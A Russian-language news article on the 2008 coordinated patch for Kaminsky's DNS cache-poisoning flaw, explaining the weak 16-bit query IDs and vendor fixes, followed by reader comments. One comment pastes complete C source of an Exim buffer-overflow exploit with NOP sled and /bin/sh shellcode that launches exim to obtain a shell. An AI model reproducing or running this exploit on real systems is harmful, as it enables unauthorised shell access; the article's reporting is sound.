В течениe минувших суток в DNS системе была ликвидирована фундаментальная ошибка

image

Владельцы Winodows-, Linux-, Unix- и Mac-серверов уже могли обратить внимание на то, что для их систем cо вчерашнего вечера доступна новая версия используемого DNS-сервера (например Bind).

В течениe минувших суток в системе интернет-адресации была ликвидирована фундаментальная ошибка, эксплуатация которой позволяла злоумышленникам подделывать адреса веб-сайтов. Данная ошибка касалась общей реализации системы доменных имен, а потому потребовала скоординированного действия всех разработчиков серверного программного обеспечения.

Владельцы Winodows-, Linux-, Unix- и Mac-серверов уже могли обратить внимание на то, что для их систем cо вчерашнего вечера доступна новая версия используемого DNS-сервера (например Bind). Выпустили обновления и крупные вендоры сетевого оборудования, такие как Cisco.

Ошибка, в результате которой пришлось "пропатчить интернет", на техническом сленге именуется, как "отравление DNS-кэша". На практике она позволяет подменить ряд записей в DNS-серерверах таким образом, что бы при наборе какого-либо привычного адреса сайта, пользователь отправлялся прямиком на сайт хакеров. Та же опасность касается и трафика электронной почты. Ситуация осложняется тем, что данный баг является в чистом виде серверным, а потому как-либо защититься от него с рабочего компьютера невозможно.

Данная фундаментальная уязвимость была обнаружена еще в прошлом году экспертом компании IO Active Дэном Камински, однако ввиду ее особой опасности сам Камински и IO Active предоставили данные о ней только легитимным разработчикам софта, а широкая общественность лишь знала о факте некой "серьезной" уязвимости в DNS.

На практике при помощи данной ошибки злоумышленник, при наличии определенных знаний и сноровки мог перенаправить весь трафик с какого-либо домена, например google.com, на сторонние серверы, в результате чего все закрытые данные, передаваемые легальному сайту, оказывались в полном распоряжении злоумышленников.

Сам Дэн Камински рассказывает, что когда ему удалось обнаружить указанную уязвимость, то вначале он сообщил об этом в листы рассылки US CERT (U.S. Computer Emergency Readiness Team), а также в несколько крупных компаний, производящих системное программное обеспечение. Понимая серьезность ситуации, все осведомленные стороны согласились держать имеющиеся у них данные в секрете. В итоге в марте этого года в штаб-квартире Microsoft состоялась встреча 16 ведущих мировых вендоров, где был выработан план по исправлению ошибки, а также утвержден график выпуска патчей или новых версий серверного ПО.

Вчера вечером Microsoft вместе с традиционным ежемесячным набором исправлений, выпускаемым в первый вторник каждого месяца, обновила систему управления доменными именами в серверных Windows. Свои патчи получили и пользователи оборудования Cisco. Также вчера на сайте Internet Systems Consortium была опубликована и новая версия системы Bind, одновременно с этим вышли новые версии этого пакета для крупнейших Linux-систем: Red Hat, Suse, Mandriva, Ubuntu и других.

Сам Камински говорит, что несмотря на серьезность ошибки, ему не удалось обнаружить в сети случаи использования данной проблемы. "Вендоры достигли соглашения, по которому изменения, внесенные с серверы, практически не затрагивают работу существующих инфраструктур, но минимизируют возможность использования уязвимости", - говорит он.

Несколько поясним суть ошибки. Вся работа глобальной сети фактически зависит от работы доменной системы. Основная задача системы доменных имен (DNS) заключается в преобразовании буквенных доменов в их числовые аналоги или ip-адреса. Система фактически работает в две стороны - то есть транслирует домены в ip-адреса и наоборот. В глобальной сети существуют около 200 000 средних и крупных DNS-серверов, обслуживающих миллионы пользователей однако вся доменная архитектура организована по цепочке, то есть разрешение имен идет от корневых серверов, но каждый DNS-сервер имеет свой головной сервер, с которого он получает необходимые для работы данные о доменах и ip-адресах.

Вот в этом-то механизме и кроется ошибка. Механизм передачи доменной информации и ее идентификация являются слабым звеном всей системы DNS. Подчиненный сервер не может определить, являются выданные на его запросы DNS-разрешения легальными данным с авторитативного сервера или это сгенерированные хакером поддельная информация. Для идентификации DNS-пакеты используют случайные идентификационные номера, но проблема в том, что этих "случайных" номеров, используемых как идентификаторы, всего 65 000. Более того, у каждого сервера есть определенная последовательность создания "случайных" запросов, поэтому злоумышленник может подделать "случайный номер" и подать DNS-серверу неверную информацию о доменах и соответствующих им адресах.

Старший программный менеджер Internet Systems Consortium Джоа Дамас говорит, что разработчикам DNS-серверов пришлось пересмотреть механизм генерации "случайных номеров", чтобы снять лимит в 65 000 последовательностей, а кроме того, добавить защитные механизмы, позволяющие серверу быстро "забыть"  некорректные данные. Помимо этого, на сайте US CERT изложены и другие рекомендации по защите - http://www.us-cert.gov/current/index.html#dns_implementations_vulnerable_to_cache

или введите имя

CAPTCHA
Страницы: 1  2  3  4  
1
09-07-2008 19:00:54
жаль не кто не повеселился
0 |
1
09-07-2008 23:04:49
Вау! Мы чуть все не умерли. Интересно связано ли это с попыткой запуска коллайдера?
0 |
1
11-07-2008 08:28:50
Еще пару лет назад нашел это: dns exploit.c /* * ripped straight off iDEFENSE advisory - so lazy I just picked * up GDB... bored on a weeknight * * nothing to write home to mother about due to the fact that * you need a local user account on a server and all you * get is to read other people's emails .... * * not even my own shellcode. aleph1 shellcode - cut and paste job * with nops to pad. * * Regards, * Plugger aka Tony Lockett * * * */ char bomb[288]= /* the gear from iDEFENSE */ "::%A:::::::::::::::::" /* 21 bytes */ /* -------- */ /* NOPS for padding */ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90" /* 218 bytes */ /* --------- */ /* actual code courtesy Aleph1 */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" /* 12 bytes */ "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" /* 12 bytes */ "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80" /* 9 bytes */ "\xe8\xdc\xff\xff\xff/bin/sh" /* 12 bytes */ /* where EIP should point */ "\xf4\xf2\xff\xbf"; /* 4 bytes */ /* -------- */ /* 49 bytes */ /* -------- */ /* 288 bytes */ /* ========= */ main() { char *exim[4]; exim[0] = "/usr/exim/bin/exim"; exim[1] = "-bh"; exim[2] = bomb; exim[3] = 0x0; printf("Firing up exim - cross your fingers for shell!\n"); execve(exim[0],exim,0x0); return; }
0 |
1
09-07-2008 19:03:19
Сам Камински говорит, что несмотря на серьезность ошибки, ему не удалось обнаружить в сети случаи использования данной проблемы.кстати, в свете этого, прикольно погуглить и почитать материалы на тему "dns poisoning"
0 |
1
09-07-2008 19:19:47
Ну-ну, а иканн как ломали?
0 |
1
09-07-2008 20:30:36
Да! Правильно! Тренируем память, запоминаем IPv6 адреса!
0 |
1
09-07-2008 20:34:56
+1
0 |
1
09-07-2008 23:33:53
+2
0 |
1
09-07-2008 23:55:52
+3 =)
0 |
1
10-07-2008 04:54:15
+фидо
0 |
1
10-07-2008 06:56:39
Internetокапец++!!! =)
0 |
1
05-08-2008 10:53:06
дайте ip-пойнта!!!
0 |
10-07-2008 09:28:42
Они у меня на ладошке записаны =)
0 |
1
10-07-2008 11:53:17
+4 )
0 |
09-07-2008 20:37:25
а кроме того, добавить защитные механизмы, позволяющие серверу быстро "забыть" некорректные данные<paranoid mode on> то есть теперь по команде с корневых серверов можно быстро стереть инфу о любом домене во всех ДНС? А не станут ли это использовать для оперативного прихлопывания нежелательных ресурсов?
0 |
1
09-07-2008 20:56:49
Чувак, ты параноид мод забыл выключить. Теперь шугаца всех будешь! o_O
0 |
1
09-07-2008 22:22:20
<paranoid mode off>
0 |
Страницы: 1  2  3  4